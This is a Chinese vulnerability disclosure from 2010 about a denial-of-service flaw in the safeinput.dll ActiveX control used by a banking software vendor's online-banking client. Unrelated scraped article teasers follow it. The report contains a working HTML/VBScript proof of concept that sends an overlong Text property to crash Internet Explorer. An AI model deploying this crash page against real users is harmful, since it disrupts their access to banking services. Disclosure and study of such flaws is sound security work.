漏洞详情

披露状态:

2010-07-25: 积极联系厂商并且等待厂商认领中,细节不对外公开
2010-07-25: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

北京宇信易诚是国内领先的网银解决方案提供商,在国内拥有大量的银行客户(客户列表http://www.yuchengtech.com/success.php),但是其网银客户端安全控件safeinput.dll存在远程拒绝服务漏洞可导致ie崩溃

详细说明:

Text变量长度未做控制,如果提交的过长的参数,之后的操作会导致内存异常,使IE崩溃出错
经过分析,该漏洞不能用来执行代码.

漏洞证明:

<html>
eChannels Century safeinput.dll test page
<object classid='clsid:ECCBA953-80E5-11D3-9285-0080ADB811C5' id='target' ></object>
<script language='vbscript'>
targetFile = "C:\WINDOWS\system32\safeinput.dll"
prototype  = "Property Let Text As String"
memberName = "Text"
progid     = "safeSetInputLib.safeInput"
argCount   = 1
arg1=String(45530, "A")
target.Text = arg1
</script>

修复方案:

限制Text长度

版权声明:转载请注明来源 路人甲@乌云

宇信易诚网银客户端安全控件存在远程拒绝服务漏洞相关推荐

  1. 宇信易诚 两季度亏损与高管出走的背后

    上市之初的宇信易诚(NASDAQ:YTEC),曾经连续两年业绩增长速度超过40%.那个一度产品线最全.品牌影响力最大.资金最雄厚的金融行业方案商--宇信易诚,近两个季度却出现了业绩的连续亏损.这在宇信 ...

  2. 宇信易诚 为何成长如此之快

    宇信易诚:服务中国金融 在洪卫东的眼睛里,我们几乎无法发现自得和欣喜,虽然他领导的北京宇信易诚科技有限公司刚刚在今年三月成为国内第一家在纳斯达克上市的金融行业应用软件服务公司,并且洪卫东本人作为宇信易 ...

  3. 三个offer,宇信易诚、软通动力、信雅达

    我是做软件测试的,最近收到了三个offer,大家给点意见. 宇信易诚:银行项目,6.5k,有年终奖,加班有补休,5险1金按2000的最低标准买,工作强度大 信雅达:银行项目,7k(每月另外有400的补 ...

  4. 宇信易诚“高级系统架构师”内训圆满结束

    宇信易诚"高级系统架构师"课程于2013.11.30-12.1成功举办.在这两天的时间里,宇信易诚的几十位技术负责人及骨干同谢老师和袁老师一起畅游在思考的海洋,充分吸取并享受着知识 ...

  5. 宇信易诚怎么样?刚拿到offer,犹豫中

    小弟毕业2年,一直在金融IT行业做,主要掌握的技术J2EE.经历了2个大项目,都是在已有的技术平台上作开发的,技术难度一般,要用的技术基本上在原有平台上可以找到原型,所以也不难,关键是熟悉平台.数据库 ...

  6. 宇信易诚Liana银行系统软件界面设计

    宇信易诚Liana银行系统软件界面设计

  7. 广州宇信易诚科技有限公司面试题

    1.struts的处理流程 1.客户端初始化一个指向Servlet容器(例如Tomcat)的请求: 2.这个请求经过一系列的过滤器(Filter)(这些过滤器中有一个叫做ActionContextCl ...

  8. 2015北京宇信易诚科技面试题

    1.什么是多表关联:http://www.w3school.com.cn/sql/sql_join.asp 2.存储过程:http://www.cnblogs.com/hoojo/archive/20 ...

  9. 2014年10月25日深圳彩讯科技和北京宇信易诚的笔试记录

    最近找工作十分的不顺利,但是还是要坚持.不管是大的还是小的,我都需要跑,需要去参加笔试.今天参加了两个 一个是考C++得,另外一个是考java的.

  10. 宇信易诚java面试_宇信易诚笔试题

    我知道笔试B是英文水平测试,包括三部分,单词.英译汉.作文,难度都不大 但是他们的要求非常之高,总共6个题,共11个空,我们必须对9个才算及格,也就是说最多错一道题吧,因为有些题是3个空,有些是2个空 ...

最新文章

  1. 关于python中文处理
  2. 视图的概念以及使用视图的好处
  3. 【C++ grammar】nullptr and Dynamic Memory Allocation (空指针和动态内存分配)
  4. Php点击更换封面,JavaScript_js实现点击图片改变页面背景图的方法,本文实例讲述了js实现点击图 - phpStudy...
  5. ktv登陆功能的实现 1216
  6. 【华为云技术分享】云图说|人工智能新科技—文字识别服务
  7. JQzoom的一些问题
  8. Centos 7.3 搭建php7,mysql5.7,nginx1.10.1,redis
  9. Linux上安装Hadoop集群(CentOS7+hadoop-2.8.3)
  10. c语言 dirent,DIR和dirent结构体
  11. VS2017社区版30天到期无法使用,激活方式
  12. 优酷mac版视频怎么转码,如何将kux格式转成mp4格式
  13. 进程专题01篇——Linux下的进程结构(黑马程序员)
  14. 使用js脚本实现微信定时发送信息
  15. Linux下编写C语言
  16. Web答辩问题整合一
  17. 论文阅读 Adaptive Consistency Regularization for Semi-Supervised Transfer Learning
  18. 2013应届毕业生各大IT公司待遇整理汇总篇(转)
  19. Mysql技术内幕InnoDB存储引擎——InnoDB存储引擎
  20. ker矩阵是什么意思_用初等变换求逆矩阵的小小解释

热门文章

  1. 易语言大漠透明图制作与使用
  2. 关于AI拍照搜题的一些想法
  3. Vulnstack红日安全内网域渗透靶场1实战
  4. 电子邮件收发这样实现!!!
  5. java语言飞机大战代码_飞机大战JAVA代码
  6. 第十三届蓝桥杯2022各组完整真题(可评测)
  7. Android-蓝牙AVRCP 以及 绝对音量(absolute volume)概述-A2dp-hfp
  8. 液压系统和阀的动画,让复杂工作原理看起来更加简单明了!
  9. sql盲注 解决_SQL盲注攻击的简单介绍
  10. 软件测试工程师常用网站整理汇总